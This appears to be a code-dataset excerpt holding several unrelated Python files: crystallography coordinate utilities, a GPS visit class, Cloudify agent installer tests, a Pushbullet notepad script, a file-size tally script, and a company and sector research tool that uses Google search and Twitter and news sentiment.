[float(adp[4]), float(adp[5]), float(adp[2])]])
rotmati = np.matrix(rotmat)
rotmatiT = np.transpose(rotmati)
rotmat = np.linalg.inv(rotmat)
Nmat = np.matrix([[1 / cell[0], 0, 0],
[0, 1 / cell[1], 0],
[0, 0, 1 / cell[2]]])
Nmat = np.linalg.inv(Nmat)
NmatT = np.transpose(Nmat)
adp = np.dot(rotmati, adp)
adp = np.dot(adp, rotmatiT)
adp = np.dot(Nmat, adp)
adp = np.dot(adp, NmatT)
adp = np.array(adp).flatten().tolist()
return [adp[0], adp[4], adp[8], adp[1], adp[2], adp[5]]
def rotate_list_by(coordlist, R):
"""
Returns a list of coordinates where every position is rotated by
the the rotation matrix 'R'.
"""
for coord in xrange(len(coordlist)):
value = np.dot(R, coordlist[coord])
value = np.array(value).reshape(-1, ).tolist()
coordlist[coord] = value
return coordlist
def write_xyz(coords, name):
filepointer = open(name, 'w')
filepointer.write(str(len(coords)))
filepointer.write('\n' + name + '\n')
for line in coords:
filepointer.write('C ')
for coord in line:
filepointer.write(str(coord) + ' ')
filepointer.write('\n')
filepointer.close()
def write_xyzqt(coords, name):
filepointer = open(name, 'a')
filepointer.write(name + '\n')
for line in coords:
filepointer.write('C ')
for coord in line:
filepointer.write(' ' + str(coord))
filepointer.write('\n')
filepointer.close()
def get_3drotation_matrix(axis, angle):
"""
Returns the rotation matrix that rotates a vector around the given axis
by the given angle using the "Euler-Rodrigues formula".
"""
angle = angle #*-1
norm = np.linalg.norm(np.array(axis))
if norm > 0:
axis /= norm
ax, ay, az = axis[0], axis[1], axis[2]
cos, sin = np.cos(angle), np.sin(angle)
rotmat = np.array([[cos + ax * ax * (1 - cos), ax * ay * (1 - cos) - az * sin, ax * az * (1 - cos) + ay * sin],
[ay * ax * (1 - cos) + az * sin, cos + ay * ay * (1 - cos), ay * az * (1 - cos) - ax * sin],
[az * ax * (1 - cos) - ay * sin, az * ay * (1 - cos) + ax * sin, cos + az * az * (1 - cos)]])
return rotmat
def get_normal_vector_of_plane(p1, p2, p3):
"""
Returns the normal vector of a plane defined by the points p1,p2 and p3.
"""
v12 = np.array(p1) - np.array(p2)
v13 = np.array(p1) - np.array(p3)
nvec = np.cross(v12, v13)
## print 'norm: '+str(np.linalg.norm(nvec))
return nvec / np.linalg.norm(nvec)
def read_gaussian_coords():
atomlist = []
filepointer = open('g98.out', 'r')
for line in filepointer.readlines():
if 'Distance' in line: break
try:
newline = [float(i) for i in line.split(' ') if len(i) > 0]
newline = [newline[:2], np.array(newline[3:])]
atomlist.append(newline)
except:
pass
return atomlist
def get_closest_neighbours(atomlist, neighbours=2):
"""
Returns a list where every element is a list of three atomnames. The second and third
names are the closest neighbours of the first names.
The argument is a list as returned by frac_to_cart and the number of neighbours to be
returned.
"""
print('atomlist', atomlist)
neighbourlist = []
for atom in atomlist:
listline = [atom[0][0]]
dists = []
distsc = []
for partner in atomlist:
dists.append(np.linalg.norm(atom[1] - partner[1]))
distsc.append(np.linalg.norm(atom[1] - partner[1]))
dists.remove(min(dists))
for _ in range(neighbours):
if min(dists) < 2.5:
listline.append(atomlist[distsc.index(min(dists))][0][0])
dists.remove(min(dists))
#listline.append(atomlist[distsc.index(min(dists))][0][0])
neighbourlist.append(listline)
return neighbourlist
def calculate_distance_matrix(atomlist):
"""
Calculates for every atom the distances to all other atoms
in atomlist.
Returns a list where every element is a list of all distances.
"""
distlist = []
for atom in atomlist:
atomdict = {}
for partner in atomlist:
if not str(int(partner[0][1])) in atomdict.keys():
atomdict[str(int(partner[0][1]))] = []
atomdict[str(int(partner[0][1]))].append(np.linalg.norm(atom[1] - partner[1]))
else:
atomdict[str(int(partner[0][1]))].append(np.linalg.norm(atom[1] - partner[1]))
atomdict[str(int(partner[0][1]))].sort()
distlist.append(atomdict)
return distlist
def link_atoms_by_distance(distlist1, atomlist1, distlist2, atomlist2, keys):
"""
The function is able to identify equal atoms of one molecule in different
coordinate systems independent of the molecule's orientaion.
"""
hitlist = []
for atom in distlist1:
atomtype = int(atomlist1[distlist1.index(atom)][0][1])
valuelist = []
for partner in distlist2:
partnertype = int(atomlist2[distlist2.index(partner)][0][1])
if atomtype == partnertype:
partnervalue = 0
keylist = partner.keys()
for key in keylist:
for element in xrange(len(atom[key])):
partnervalue += abs(atom[key][element] - partner[key][element])
else:
partnervalue = 9999999
valuelist.append(partnervalue)
minvalue = min(valuelist)
besthit = valuelist.index(minvalue)
hitlist.append(besthit)
def make_list_unique(seq, idfun=None):
if idfun is None:
def idfun(x): return x
seen = {}
result = []
for item in seq:
marker = idfun(item)
if marker in seen: continue
seen[marker] = 1
result.append(item)
return result
def get_influence_atoms(atomlist):
"""
Determines the atoms defining the chemical enviroment of a given atom by checking
their bonding partners. Only the first and second neighbours are considered.
"""
enviromentlist = []
trunclist = []
neighbourlist = get_closest_neighbours(atomlist, 4)
for neighbours in neighbourlist:
if neighbours[0][0] == "H":
neighbours = neighbours[:2]
if neighbours[0][0] == "O":
neighbours = neighbours[:3]
trunclist.append(neighbours)
for atom in trunclist:
newatom = []
for atom1partner in atom[1:]:
for partner in trunclist:
if partner[0] == atom1partner:
counter = 0
for atomi in partner:
if atomi[0] == 'H':
counter += 1
if counter < 2 or (partner[0] in atom and atom[0][0] == 'H'):
newatom += atom + partner[1:]
newatom = make_list_unique(newatom)
newatom.sort()
enviromentlist.append(newatom)
return enviromentlist
def link_atoms_by_distance_diff(distlist1, atomlist1, distlist2, atomlist2, keys):
"""
The function is able to identify equivalent atoms in different molecules in different
coordinate systems independent of the molecule's orientaion.
"""
hitlist = []
for atom in distlist1:
atomtype = int(atomlist1[distlist1.index(atom)][0][1])
valuelist = []
for partner in distlist2:
partnertype = int(atomlist2[distlist2.index(partner)][0][1])
if atomtype == partnertype:
partnervalue = 0
keylist = partner.keys()
for key in keylist:
for element in xrange(len(atom[key])):
value = abs(atom[key][element] - partner[key][element])
partnervalue += value
else:
partnervalue = 9999999
valuelist.append(partnervalue)
minvalue = min(valuelist)
besthit = valuelist.index(minvalue)
hitlist.append(besthit)
def read_multiple_coordinates(fragmentnames):
"""
Calls read_coordinates and frac_to_cart for every path=name in fragmentnames and returns a
dictionary where every returnvalue of frac_to_cart is keyed to its fragment name.
"""
fragdict = {}
for name in fragmentnames:
path = name + '/'
cell, pos = read_coordinates(path)
atomlist = frac_to_cart(cell, pos)
atomdict = {}
for atom in atomlist:
atomdict[atom[0][0]] = atom[1]
fragdict[name] = atomlist
return fragdict
##def read_coordinates(path=''):
## """
## Reads the cell parameters from a 'xd.mas' file and the atomic positions
## from a 'xd.res' file.
## The function returns a list with the cell parameters and an dictionary which
## keys the atom name to its fractional coordinates.
## """
## maspointer=open(path+'xd.mas','r')
## respointer=open(path+'xd.res','r')
## positions={}
## keylist=[] #Needed to keep the atomlist order. This is important for the frequency read function.
## for line in maspointer.readlines():
## if 'CELL' in line:
## cell=[float(i) for i in line.split(" ") if '.' in i]
## for line in respointer.readlines():
## if '(' in line and not '!' in line:
## coords=[float(i) for i in line.split(" ") if '.' in i]
## coords=coords[:-1]
## key=line.split(" ")[0]
## keylist.append(key)
## positions[key]=coords
## sortkeylist=[]
## for i in xrange(len(keylist)):
## j=i+1
## for key in keylist:
## if j==int(key[2:-1]):
## sortkeylist.append(key)
## return cell,positions,sortkeylist
def read_xd_master_file(path, errorpointer):
"""
Returns the compound name and the cell parameters from a xd.mas style
file specified by 'path'.
"""
filepointer = open(path, 'r')
for line in filepointer.readlines():
if 'TITLE' in line:
compound_name = line.partition('!')[2].lstrip().rstrip()
if 'CELL' in line:
cell = [float(i) for i in line.split(" ") if '.' in i]
break
filepointer.close()
try:
return compound_name, cell
except:
errorpointer.write(path + '\n')
return None, None
def read_xd_parameter_file(path, sort=False):
respointer = open(path, 'r')
positions = {}
keylist = []
for line in respointer.readlines():
if '(' in line and not '!' in line:
coords = [float(i) for i in line.split(" ") if '.' in i]
coords = coords[:-1]
key = line.split(" ")[0]
keylist.append(key)
positions[key] = coords
if sort:
sortkeylist = []
for i in xrange(len(keylist)):
j = i + 1
for key in keylist:
number = get_number(key)
if j == int(number):
sortkeylist.append(key)
else:
sortkeylist = keylist
return positions, sortkeylist
def read_coordinates(path='', sort=True):
"""
Reads the cell parameters from a 'xd.mas' file and the atomic positions
from a 'xd.res' file.
The function returns a list with the cell parameters and an dictionary which
keys the atom name to its fractional coordinates.
"""
maspointer = open(path + 'xd.mas', 'r')
respointer = open(path + 'xd.res', 'r')
positions = {}
keylist = [] #Needed to keep the atomlist order. This is important for the frequency read function.
for line in maspointer.readlines():
if 'CELL ' in line:
cell = [float(i) for i in line.split(" ") if '.' in i]
break
for line in respointer.readlines():
if '(' in line and not '!' in line:
coords = [float(i) for i in line.split(" ") if '.' in i]
coords = coords[:-1]
key = line.split(" ")[0]
keylist.append(key)
positions[key] = coords
if sort:
sortkeylist = []
for i in xrange(len(keylist)):
j = i + 1
for key in keylist:
number = get_number(key)
if j == int(number):
sortkeylist.append(key)
else:
sortkeylist = keylist
return cell, positions, sortkeylist
def get_number(atomname):
"""
Returns the number in the brackets of an atomname.
"""
switch = False
number = ''
for char in atomname:
if char == ')':
switch = False
if switch:
number += char
if char == '(':
switch = True
return number
def frac_to_cart(cell, positions):
"""
Transforms a set of given fractional coordinates to cartesian coordinates.
Needs a list containing the cell parameters as its first argument and the dictionary
returned by read coordinates().
Returns a dictionary with cartesian coordinates analog to fractional dictionary.
"""
atomlist = []
counter = 1
a, b, c = cell[0], cell[1], cell[2]
alpha, beta, gamma = cell[3] / 180 * np.pi, cell[4] / 180 * np.pi, cell[5] / 180 * np.pi
v = np.sqrt(1 - np.cos(alpha) * np.cos(alpha) - np.cos(beta) * np.cos(beta) - np.cos(gamma) * np.cos(gamma) \
+ 2 * np.cos(alpha) * np.cos(beta) * np.cos(gamma))
transmatrix = np.matrix([[a, b * np.cos(gamma), c * np.cos(beta)],
[0, b * np.sin(gamma), c * (np.cos(alpha) - np.cos(beta) * np.cos(gamma)) / np.sin(gamma)],
[0, 0, c * v / np.sin(gamma)]])
for atom in positions:
coordmatrix = np.dot(transmatrix, positions[str(atom)])
coordmatrix = np.array(coordmatrix).flatten().tolist()
atomlist.append([])
atomlist[-1].append([atom, atomtable[atom[0]]])
counter += 1
atomlist[-1].append(np.array(coordmatrix))
return atomlist
def list_to_dict(atomlist, full=False):
"""
Keys the coordinates of the atoms read from xd.res to the numerical part of its name.
"""
atomdict = {}
if full:
for atom in atomlist:
atomdict[atom[0]] = atom[1]
else:
for atom in atomlist:
atomdict[atom[0][0]] = atom[1]
return atomdict
#===============================================================================
# def link_atoms(gatomlist,xatomdict):
# """
# Returns a list of pairs of equivalten atoms.
# """
# linklist=[]
# keylist=xatomdict.keys()
# for atom in xrange(len(gatomlist)):
# for key in keylist:
# if int(key)==atom+1:
# linklistline=[atomlist[atom][1],xatomdict[key]]
# linklist.append(linklistline)
# break
# return linklist
#===============================================================================
#===============================================================================
# def get_random_plane(linklist):
# """
# Randomly picks three atoms to build a plane from.
# """
# planepoints=random.sample(linklist,3)
# gplanenorm=get_normal_vector_of_plane(planepoints[0][0],planepoints[1][0],planepoints[2][0])
# gplanedir=np.linalg.norm(planepoints[0][0]-planepoints[1][0])
# xplanenorm=get_normal_vector_of_plane(planepoints[0][1],planepoints[1][1],planepoints[2][1])
# xdplanedir=np.linalg.norm(planepoints[0][1]-planepoints[1][1])
# return gplanenorm,xplanenorm
#===============================================================================
def get_angle(v1, v2):
"""
Returns the angle between two vectors.
"""
return np.arccos(np.dot(v1, v2))
def read_invout_database(path):
path += 'Invariome.out'
filepointer = open(path, 'r')
invnames = {}
for line in filepointer.readlines():
splitted = line.split(' ')
invnames[splitted[0][:-1]] = splitted[1][:-1]
return invnames
|
7,937 | 703ed320e7c06856a0798d9c0de9aafe24458767 | from entities.GpsFix import GpsFix
class Visit(object):
"""
A Visit, which represents an arrival-departure to a stay point
Attributes:
id_visit: the id of the visit itself
id_stay_point: the id of the stay point
pivot_arrival_fix: the GpsFix that corresponds to real world arrival
pivot_departure_fix: the GpsFix that corresponds to real world departure
detection_arrival_fix: the GpsFix that triggered the arrival by the platform
detection_departure_fix: the GpsFix that triggered the departure by the platform
stay_time: stay time of the visit in seconds
"""
def __init__(self, id_visit, id_stay_point, pivot_arrival_fix: GpsFix, pivot_departure_fix: GpsFix,
detection_arrival_fix: GpsFix,
detection_departure_fix: GpsFix):
"""
Builds a Visit object
:param id_visit: the id of the visit
:param id_stay_point: the id of the stay point
:param pivot_arrival_fix: the GpsFix that corresponds to real world arrival
:param pivot_departure_fix: the GpsFix that corresponds to real world departure
:param detection_arrival_fix: the GpsFix that triggered the arrival by the platform
:param detection_departure_fix: the GpsFix that triggered the departure by the platform
"""
self.id_visit = id_visit
self.id_stay_point = id_stay_point
self.pivot_arrival_fix = pivot_arrival_fix
self.pivot_departure_fix = pivot_departure_fix
self.detection_arrival_fix = detection_arrival_fix
self.detection_departure_fix = detection_departure_fix
self.stay_time = None
self.update_stay_time()
def update_stay_time(self):
"""
Updates the stay time of visit
:return: None
"""
# It would not be better to simply self.stay_time = self.get_length() ??
self.stay_time = self.get_length()
def get_length(self) -> int:
"""
Gets the length of visit in seconds
:return: The length of visit in seconds
"""
return (self.pivot_departure_fix.timestamp - self.pivot_arrival_fix.timestamp).total_seconds()
def __str__(self):
date_format = '%Y-%m-%d %H:%M:%S'
return '{},{},{},{},{}'.format(self.id_visit, self.id_stay_point,
self.pivot_arrival_fix.timestamp.strftime(date_format),
self.pivot_departure_fix.timestamp.strftime(date_format), self.get_length())
|
7,938 | eed3ec2897d4da20b576cb4e2ce95331ae223f76 | #########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import shutil
import tempfile
import uuid
from mock import patch
from cloudify.workflows import local
from cloudify.utils import setup_logger
from cloudify_agent.tests import resources
from cloudify_agent.tests.utils import (
FileServer,
get_source_uri,
get_requirements_uri)
from cloudify_agent.tests.api.pm import BaseDaemonLiveTestCase
from cloudify_agent.tests.api.pm import only_ci, only_os
from cloudify_agent.api import utils
##############################################################################
# these tests run a local workflow to install the agent on the local machine.
# it should support both windows and linux machines. and thus, testing the
# LocalWindowsAgentInstaller and LocalLinuxAgentInstaller.
# the remote use cases are tested as system tests because they require
# actually launching VM's from the test.
##############################################################################
class AgentInstallerLocalTest(BaseDaemonLiveTestCase):
"""
these tests run local workflows in order to invoke the installer
operations. the remote use case is tested as part of the system tests.
"""
@classmethod
def setUpClass(cls):
cls.logger = setup_logger(cls.__name__)
cls.source_url = get_source_uri()
cls.requirements_file = get_requirements_uri()
def setUp(self):
super(AgentInstallerLocalTest, self).setUp()
self.resource_base = tempfile.mkdtemp(
prefix='file-server-resource-base')
self.fs = FileServer(
root_path=self.resource_base)
self.fs.start()
self.addCleanup(self.fs.stop)
self.addCleanup(shutil.rmtree, self.resource_base)
@patch.dict('agent_packager.logger.LOGGER',
disable_existing_loggers=False)
@patch('cloudify.workflows.local._validate_node')
@only_ci
def test_local_agent_from_package(self, _):
agent_name = utils.internal.generate_agent_name()
agent_queue = '{0}-queue'.format(agent_name)
blueprint_path = resources.get_resource(
'blueprints/agent-from-package/local-agent-blueprint.yaml')
self.logger.info('Initiating local env')
inputs = {
'resource_base': self.resource_base,
'source_url': self.source_url,
'requirements_file': self.requirements_file,
'name': agent_name,
'queue': agent_queue,
'file_server_port': self.fs.port
}
env = local.init_env(name=self._testMethodName,
blueprint_path=blueprint_path,
inputs=inputs)
env.execute('install', task_retries=0)
self.assert_daemon_alive(name=agent_name)
env.execute('uninstall', task_retries=1)
self.wait_for_daemon_dead(name=agent_name)
@only_os('posix')
@patch('cloudify.workflows.local._validate_node')
@only_ci
def test_local_agent_from_package_long_name(self, _):
"""Agent still works with a filepath longer than 128 bytes
Paths longer than 128 bytes break shebangs on linux.
"""
agent_name = 'agent-' + ''.join(uuid.uuid4().hex for i in range(4))
agent_queue = '{0}-queue'.format(agent_name)
blueprint_path = resources.get_resource(
'blueprints/agent-from-package/local-agent-blueprint.yaml')
self.logger.info('Initiating local env')
inputs = {
'resource_base': self.resource_base,
'source_url': self.source_url,
'requirements_file': self.requirements_file,
'name': agent_name,
'queue': agent_queue,
'file_server_port': self.fs.port
}
env = local.init_env(name=self._testMethodName,
blueprint_path=blueprint_path,
inputs=inputs)
env.execute('install', task_retries=0)
self.assert_daemon_alive(name=agent_name)
env.execute('uninstall', task_retries=1)
self.wait_for_daemon_dead(name=agent_name)
@only_ci
@patch('cloudify.workflows.local._validate_node')
@patch.dict('agent_packager.logger.LOGGER',
disable_existing_loggers=False)
def test_local_agent_from_source(self, _):
agent_name = utils.internal.generate_agent_name()
agent_queue = '{0}-queue'.format(agent_name)
inputs = {
'source_url': self.source_url,
'requirements_file': self.requirements_file,
'name': agent_name,
'queue': agent_queue
}
blueprint_path = resources.get_resource(
'blueprints/agent-from-source/local-agent-blueprint.yaml')
self.logger.info('Initiating local env')
env = local.init_env(name=self._testMethodName,
blueprint_path=blueprint_path,
inputs=inputs)
env.execute('install', task_retries=0)
self.assert_daemon_alive(name=agent_name)
env.execute('uninstall', task_retries=1)
self.wait_for_daemon_dead(name=agent_name)
@only_ci
@patch('cloudify.workflows.local._validate_node')
@patch.dict('agent_packager.logger.LOGGER',
disable_existing_loggers=False)
def test_3_2_backwards(self, _):
agent_name = utils.internal.generate_agent_name()
agent_queue = '{0}-queue'.format(agent_name)
inputs = {
'source_url': self.source_url,
'requirements_file': self.requirements_file,
'name': agent_name,
'queue': agent_queue
}
blueprint_path = resources.get_resource(
'blueprints/3_2-agent-from-source/3_2-agent-from-source.yaml')
self.logger.info('Initiating local env')
env = local.init_env(name=self._testMethodName,
blueprint_path=blueprint_path,
inputs=inputs)
env.execute('install', task_retries=0)
self.assert_daemon_alive(name=agent_name)
env.execute('uninstall', task_retries=1)
self.wait_for_daemon_dead(name=agent_name)
@only_os('posix')
@only_ci
@patch('cloudify.workflows.local._validate_node')
def test_local_agent_from_source_long_name(self, _):
"""Agent still works with a filepath longer than 128 bytes
This test won't pass on windows because some files within the
virtualenv exceed 256 bytes, and windows doesn't support paths
that long.
"""
agent_name = 'agent-' + ''.join(uuid.uuid4().hex for i in range(4))
agent_queue = '{0}-queue'.format(agent_name)
inputs = {
'source_url': self.source_url,
'requirements_file': self.requirements_file,
'name': agent_name,
'queue': agent_queue
}
blueprint_path = resources.get_resource(
'blueprints/agent-from-source/local-agent-blueprint.yaml')
self.logger.info('Initiating local env')
env = local.init_env(name=self._testMethodName,
blueprint_path=blueprint_path,
inputs=inputs)
env.execute('install', task_retries=0)
self.assert_daemon_alive(name=agent_name)
env.execute('uninstall', task_retries=1)
self.wait_for_daemon_dead(name=agent_name)
|
7,939 | 66cc9ca3d8cbe9690da841e43cef217f3518122c | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import functools
import os
import platform
import sys
import webbrowser
import config
from pushbullet import Pushbullet
class Zui:
def __init__(self):
self.pb = Pushbullet(self.api_key())
self.target = self.make_devices()
self.dayone = config.URL_SCHEME
self.clear, self.pause = self.check_platform()
def api_key(self):
if config.API_KEY:
return config.API_KEY
else:
webbrowser.open('https://www.pushbullet.com/account')
API_KEY = input('Copy and Paste Access Token: ')
self.config_setting(API_KEY)
return API_KEY
def config_setting(self, api_key):
with open('config.py', 'r') as rf:
setting = rf.readlines()
setting[0] = 'API_KEY = "{0}"\n'.format(api_key)
with open('config.py', 'w') as wf:
wf.writelines(setting)
wf.flush()
def make_devices(self):
for d in self.pb.devices:
if config.PUSH_TARGET == d.nickname:
return d
else:
new_device = self.pb.new_device(config.PUSH_TARGET)
# model argument was not used, only nickname
self.pb.edit_device(
new_device,
nickname=config.PUSH_TARGET,
model=config.PUSH_TARGET
)
self.make_devices()
def clear_notepad(f):
functools.wraps(f)
def wraps(*args):
os.system(args[0].clear)
result = f(*args)
os.system(args[0].clear)
return result
return wraps
@clear_notepad
def push_to_dayone(self):
'''Pushbullet couldn't link then whitespace in URL.
So, it doesn't push_link, just push_note.
Unavilable DayOne URL shceme.
'''
try:
# body = self.dayone + self.notepad()
body = self.notepad()
return self.pb.push_note('', body, device=self.target)
except KeyboardInterrupt as e:
return False
def notepad(self):
try:
print('Push: {}, Close: C-c'.format(self.pause))
lines = [line for line in sys.stdin.readlines()]
return ''.join(lines)
except KeyboardInterrupt as e:
raise e
def check_platform(self):
cp = {
'Windows': (
'CLS',
'C-z'
),
'Darwin': (
'clear',
'C-d'
),
}
return cp[platform.system()][0], cp[platform.system()][1]
def main():
z = Zui()
while z.push_to_dayone():
pass
else:
print('Bye.')
if __name__ == '__main__':
main()
|
7,940 | 06aa2d261e31dfe2f0ef66dca01c1fe3db1ca94e |
import os, sys
top=sys.argv[1]
max=int(sys.argv[2])
cnts={}
for d, dirs, files in os.walk(top):
for f in files:
i=f.find(".")
if i ==-1: i=0
suf=f[i:]
rec=cnts.setdefault(suf, [0,0])
fn=d+'/'+f
if os.path.islink(fn):
sz=0
else:
sz=os.path.getsize(d+'/'+f)
rec[0]+=1; rec[1]+=float(sz)/(1024**4)
recs=sorted([(cnts[k][1], cnts[k][0], k) for k in cnts], reverse=True)
total=sum([rec[0] for rec in recs])
print ("Total %.3f" % total)
for sz, cnt, suf in sorted([(cnts[k][1], cnts[k][0], k) for k in cnts], reverse=True)[:max]:
print ("%s\t%d\t%.3f" % (suf, cnt, sz))
|
7,941 | 9c7ecd3c878d43633606439aa63f840176f20dee | # Library for Stalker project
#Libraries
import pandas as pd
import seaborn as sns
from IPython.display import Image, display
import matplotlib.pyplot as plt
# Google search
from googlesearch import search
# Tldextract to get domain of url
import tldextract as tld
# BeautifulSoup
from bs4 import BeautifulSoup as bs
from bs4.element import Comment
import urllib.request
# NLTK to analyze webs
import nltk
from nltk.corpus import stopwords
from nltk import FreqDist
from nltk.tokenize import word_tokenize
# Find close matches
from difflib import get_close_matches
# Sentiment analysis
from textblob import TextBlob
# Twitter sentiment analysis
import tweepy
# News API
from newsapi import NewsApiClient
# Credentials
import credentials as cd
# Finding info in APIs
newsapi = NewsApiClient(api_key=cd.news_credentials['api_key'])
news_sources = 'the-verge,buzzfeed,engadget,hacker-news,mashable,reddit-r-all,wired,techcrunch'
# Twitter API
consumer_key = cd.twitter_credentials['consumer_key']
consumer_key_secret = cd.twitter_credentials['consumer_key_secret']
access_token = cd.twitter_credentials['access_token']
access_token_secret = cd.twitter_credentials['access_token_secret']
auth = tweepy.OAuthHandler(consumer_key, consumer_key_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
# Finding query on Google
# Finding related urls
def find_webs(query):
urls = []
rrss = ['facebook', 'twitter', 'linkedin', 'instagram', 'youtube','pinterest','angel']
sites = []
red_social = False
for s in search(query, tld="com", num=30, stop=30, pause=3, lang='en'):
if len(urls)<10:
for rs in rrss:
if rs in s or tld.extract(s).domain in sites:
red_social = True
if not red_social and s not in urls:
urls.append(s)
sites.append(tld.extract(s).domain)
red_social = False
return urls
def tag_visible(element):
if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:
return False
if isinstance(element, Comment):
return False
return True
def text_from_html(body):
soup = bs(body, 'html.parser')
texts = soup.findAll(text=True)
visible_texts = filter(tag_visible, texts)
return u" ".join(t.strip() for t in visible_texts)
def cleaning_urls_text(url):
try:
html = text_from_html(urllib.request.urlopen(url).read())
stop_words = set(stopwords.words('english'))
word_tokens = word_tokenize(html)
return [w for w in word_tokens if not w in stop_words]
except:
return []
def filter_warning_words(sentence):
warning_word = ['lie', 'fraud', 'scam', 'extortion', 'deceit', 'crime','arson', 'assault', 'bigamy', 'blackmail',
'bribery', 'burglary', 'child abuse', 'conspiracy', 'espionage', 'forgery', 'fraud', 'genocide',
'hijacking','homicide', 'kidnapping', 'manslaughter', 'mugging', 'murder', 'perjury', 'rape', 'riot',
'robbery', 'shoplifting', 'slander', 'smuggling', 'treason', 'trespassing']
return list(filter(lambda word: word in warning_word, sentence))
def warnings_count(url):
clean_sentence = cleaning_urls_text(url)
length = len(filter_warning_words(clean_sentence))
return (url, length) if length != 0 else None
def most_warnings(urls, look_for):
list_len_tup = list(map(warnings_count, urls))
list_len_tup_clean = list(filter(lambda item: item != None, list_len_tup))
list_len_tup_clean.sort(key = lambda item: item[1], reverse=True)
top_urls = [url for url, length in list_len_tup_clean[:2]]
if len(top_urls) > 1:
print(f"""
We found something sketchy. You might want to check these links:
- {top_urls[0]}
- {top_urls[1]}
""")
elif len(top_urls) == 1:
print(f"""
We found something sketchy. You might want to check this link:
{top_urls[0]}
""")
else:
print(f"We couldn't find anything worrying about {look_for} on Google. Nice!")
# Input correction
def retrieve_name(my_name, companies):
companies_list = []
for i in companies.dropna(subset=['name']).name:
companies_list.append(i)
if my_name in companies_list:
return my_name
elif len(get_close_matches(my_name, companies_list)) > 0:
action = input("Did you mean %s instead? [y or n]: " % get_close_matches(my_name, companies_list)[0])
if (action == "y"):
return get_close_matches(my_name, companies_list)[0]
elif (action == "n"):
return my_name
else:
return("we don't understand you. Apologies.")
def retrieve_sector(my_sector, investments):
investments = investments.dropna(subset=['raised_amount_usd', 'company_category_list'])
sector_list0 = []
sector_list = []
for item in investments['company_category_list']:
if ',' in item:
sector_list0.append(item.split(sep=', '))
else:
sector_list0.append(item)
for i in sector_list0:
if type(i) == list:
for sec in i:
sector_list.append(sec)
else:
sector_list.append(i)
if my_sector in sector_list:
return my_sector
elif len(get_close_matches(my_sector, sector_list)) > 0:
action = input("Did you mean %s instead? [y or n]: " % get_close_matches(my_sector, sector_list) [0])
if (action == "y"):
return get_close_matches(my_sector, sector_list)[0]
else:
return my_sector
# Sentiment analysis tweeter
def tw_sent_sector(public_tweets, sector):
sentiment_list = []
for tweet in public_tweets:
analysis = TextBlob(tweet.text)
sentiment_list.append(analysis.sentiment[0])
if sum(sentiment_list)>0:
sent = 'Positive'
elif sum(sentiment_list)<0:
sent = 'Negative'
else:
sent = 'Neutral'
print(f"The sentiment about {sector} industry in Twitter is {sent}")
# Sentiment analysis news
def news_sentiment_sector(public_news, sector):
news_list = []
for piece in range(len(public_news['articles'])):
news_list.append(TextBlob(public_news['articles'][piece]['title']).sentiment[0])
news_list.append(TextBlob(public_news['articles'][piece]['description']).sentiment[0])
if sum(news_list)>0:
news_sent = 'Positive'
elif sum(news_list)<0:
news_sent = 'Negative'
else:
news_sent = 'Neutral'
print(f"There have been {len(public_news)} news pieces about {sector} industry recently and are in general {news_sent}")
# Look for data about sector
def category(sector, investments):
# Gather tweets
public_tweets = api.search(sector)
# Gather news
public_news = newsapi.get_everything(q=sector,sources=news_sources,language='en')
# Prepare the data for the sector
investments = investments.dropna(subset=['company_category_list'])
sector_investments = investments[investments['company_category_list'].str.contains(sector)].drop('index',axis=1)
sector_investments.reset_index(drop=True)
sector_investments['funded_at'] = pd.to_datetime(sector_investments['funded_at'])
sector_investments['Year'] = sector_investments['funded_at'].apply(lambda x: x.year )
sector_investments['Month'] = sector_investments['funded_at'].apply(lambda x: x.month )
sector_investments['Day'] = sector_investments['funded_at'].apply(lambda x: x.day )
# Sentiment analysis Twitter
tw_sent_sector(public_tweets, sector)
# Sentiment analysis News
news_sentiment_sector(public_news, sector)
# create plot
sector_year = sector_investments.groupby(['Year']).sum()[-10:]
movement = ((sector_year.raised_amount_usd.iloc[len(sector_year)-1] -sector_year.raised_amount_usd.iloc[0])/sector_year.raised_amount_usd.iloc[0]*100)
if sector_year.raised_amount_usd.iloc[0] + sector_year.raised_amount_usd.iloc[len(sector_year)-1] >= 0:
in_dec = 'increased'
grow = 'growing'
else:
in_dec = 'decreased'
grow = 'falling'
movement = movement[1:]
sns.lineplot(x=sector_year.index, y=sector_year.raised_amount_usd).set_title(f'Evolution of the amount invested in {sector}')
investments_per_year = sector_investments.groupby(['Year']).count()
peak_year = sector_year.index[sector_year['raised_amount_usd']== max(sector_year.raised_amount_usd)].to_list()
peak_amount = max(sector_year.raised_amount_usd)
#peak_year_invest = investments_per_year.index[investments_per_year['raised_amount_usd']== max(investments_per_year.raised_amount_usd)].to_list()
low_amount = min(sector_year.raised_amount_usd)
most_invested_companies = sector_investments.groupby(by='company_name').sum().sort_values(by='raised_amount_usd', ascending=False)
low_year = sector_year.index[sector_year['raised_amount_usd']== min(sector_year.raised_amount_usd)].to_list()
format_doll = ',.2f'
print(f"""The amount of money invested in {sector} companies has {in_dec} by {format(abs(movement),format_doll)}% in the last {len(sector_year)} years.
It peaked in year {peak_year[0]} with ${format(peak_amount,format_doll)} invested and its lowest point was in year {low_year[0]} with ${format(low_amount,format_doll)} invested.
""")
plt.ylabel('Raised amount in USD')
plt.show()
sns.lineplot(x=investments_per_year.index[-10:], y=investments_per_year.Day[-10:]).set_title(f'Evolution of the number of investment in {sector}')
plt.ylabel('Number of investments')
#print("""Plot explanaition average investment
""")
plt.show()
#print(f"""
# The Top 3 companies with biggest investments are:
#- {most_invested_companies.index[0]} with ${most_invested_companies.raised_amount_usd[0]} raised,
#- {most_invested_companies.index[1]} with ${most_invested_companies.raised_amount_usd[1]} raised and
#- {most_invested_companies.index[2]} with ${most_invested_companies.raised_amount_usd[2]} raised
#""")
# Sentiment analysis founder
def tw_analysis_founder(public_tweets, founder):
sentiment_list = []
for tweet in public_tweets:
analysis = TextBlob(tweet.text)
sentiment_list.append(analysis.sentiment[0])
if sum(sentiment_list)>0:
